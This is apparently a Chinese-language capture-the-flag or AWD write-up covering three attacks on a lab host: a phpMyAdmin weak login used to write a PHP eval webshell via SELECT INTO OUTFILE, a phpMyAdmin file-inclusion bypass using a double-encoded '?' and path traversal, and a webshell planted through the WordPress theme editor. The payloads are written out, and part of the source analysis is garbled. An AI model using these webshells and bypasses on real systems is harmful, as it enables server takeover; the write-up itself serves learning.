漏洞一:phpmyadmin数据库getshell

在网站源码位置发现phpmyadmin文件夹,进行文件访问
弱口令root,root进入mysql后台(也可以在数据库配置文件中查看)
phpmyadmin后台执行sql语句
select “<?php eval($_POST[cjm]);” into outfile “/app/cjm.php”;
成功getshell

漏洞二:phpmyadmin后台文件包含

登入phpmyadmin的后台
http://114.67.175.224:10477/phpmyadmin/index.php?target=db_sql.php%253f%2F…%2F…%2F…%2F…%2F…%2F…%2Fflag
源码分析
查看phpmyadmin下的index.php
跟进target_blacklist数组,过滤掉import.php和export.php
在跟进Core类的checkPageValidity方法在phpmyadmin/libraries/classes/Core.php文件

查看$goto_whitelist,是一些php文件名字组成的数组

首先checkPageValidity有两个形参,第一个是target参数(用户输入的),因为前面index.php只传了一个参数过来,所以第二个 w h i t e l i s 是 空 的 。 第 一 个 条 件 就 判 断 whitelis是空的。第一个条件就判断 whiteliswhitelis是否为空,为空的话,就将定义的goto_whitelist赋值给whitelis。
重点关注最后一个判断。
经过urldecode函数解码后 p a g e 存 在 _page存在 pagewhitelist中的某个值则返回true
这里对target参数做了判断,用?隔开,后面是直接对?做一次解码。判断经过urldecode函数解码后的 p a g e 存 在 _page存在 pagewhitelist中的某个值则返回true。这里就需要对?进行二次编码。?二次url编码为%253可绕过。这两个判断都返回true。

漏洞三:wordpress 后台getshell


后台地址
通过社工进入后台

找到编辑文件的地方

写入一句话木马进行更新文件
观察他的url是在twentyten文件夹,说明木马生成在了twentyten文件夹下
http://114.67.175.224:10477/wp-admin/theme-editor.php?file=404.php&theme=twentyten&scrollto=0

访问url,成功getshell
http://114.67.175.224:10477/wp-content/themes/twentyten/404.php

更多推荐

wordpress(awd复现)